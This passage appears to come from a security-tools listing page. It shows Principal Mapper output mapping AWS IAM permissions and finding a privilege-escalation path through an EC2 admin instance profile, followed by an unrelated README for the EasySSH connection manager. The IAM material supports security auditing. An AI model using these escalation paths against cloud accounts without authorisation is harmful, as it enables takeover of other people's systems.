    (15,6,'IAM_CREATEKEY','can create access keys with IAM to access')
    (15,7,'IAM_CREATEKEY','can create access keys with IAM to access')

    Querying with the graph
    esteringer@ubuntu:~/Documents/projects/Skywalker$ ./pmapper.py --profile skywalker query "who can do s3:GetObject with *"
    user/AdminUser can do s3:GetObject with *
    user/EC2Manager can do s3:GetObject with * through role/EC2Role-Admin
    user/EC2Manager can create an EC2 instance and use an existing instance profile to access role/EC2Role-Admin
    role/EC2Role-Admin can do s3:GetObject with *
    user/LambdaFullAccess can do s3:GetObject with *
    user/PowerUser can do s3:GetObject with *
    user/S3ManagementUser can do s3:GetObject with *
    user/S3ReadOnly can do s3:GetObject with *
    user/TestingSkywalker can do s3:GetObject with *
    role/EC2-Fleet-Manager can do s3:GetObject with * through role/EC2Role-Admin
    role/EC2-Fleet-Manager can create an EC2 instance and use an existing instance profile to access role/EC2Role-Admin
    role/EC2Role-Admin can do s3:GetObject with *
    role/EC2Role-Admin can do s3:GetObject with *
    role/EC2WithS3ReadOnly can do s3:GetObject with *
    role/EMR-Service-Role can do s3:GetObject with *
    role/LambdaRole-S3ReadOnly can do s3:GetObject with *
    role/UpdateCredentials can do s3:GetObject with * through user/AdminUser
    role/UpdateCredentials can create access keys with IAM to access user/AdminUser
    user/AdminUser can do s3:GetObject with *

    Identifying Potential Privilege Escalation
    esteringer@ubuntu:~/Documents/projects/Skywalker$ ./pmapper.py --profile skywalker query "preset priv_esc user/PowerUser"
    Discovered a potential path to change privileges:
    user/PowerUser can change privileges because:
    user/PowerUser can access role/EC2Role-Admin because:
    user/PowerUser can create an EC2 instance and use an existing instance profile to access role/EC2Role-Admin
    and role/EC2Role-Admin can change its own privileges.

    Planned TODOs
    • Complete and verify Python 3 support.
    • Smarter control over rate of API requests (Queue, managing throttles).
    • Better progress reporting.
    • Validate and add more checks for obtaining credentials. Several services use service roles that grant the service permission to do an action within a user's account. This could potentially allow a user to obtain access to additional privileges.
    • Improving simulate calls (global conditions).
    • Completing priv esc checks (editing attached policies, attaching to a group).
    • Adding options for visualization (output type, edge collation).
    • Adding more caching.
    • Local policy evaluation?
    • Cross-account subcommand(s).
    • A preset to check if one principal is connected to another.
    • Handling policies for buckets or keys with services like S3 or KMS when querying.


    EasySSH - The SSH Connection Manager To Make Your Life Easier



    A complete, efficient and easy-to-use SSH connection manager. Create and edit connections and groups, customize the terminal, and open multiple instances of the same connection.

    Developing and Building
    If you want to hack on and build EasySSH yourself, you'll need the following dependencies:
    • libgee-0.8-dev
    • libgtk-3-dev
    • libgranite-dev
    • libvte-2.91-dev
    • libjson-glib-dev
    • libunity-dev
    • meson
    • valac
    Run meson build to configure the build environment, then run ninja test to build and run the automated tests:
    meson build --prefix=/usr
    cd build
    ninja test
    To install, use ninja install, then execute with com.github.muriloventuroso.easyssh
    sudo ninja install
    com.github.muriloventuroso.easyssh

    Install with Flatpak
    Install:
    flatpak install flathub com.github.muriloventuroso.easyssh
    Run:
    flatpak run com.github.muriloventuroso.easyssh

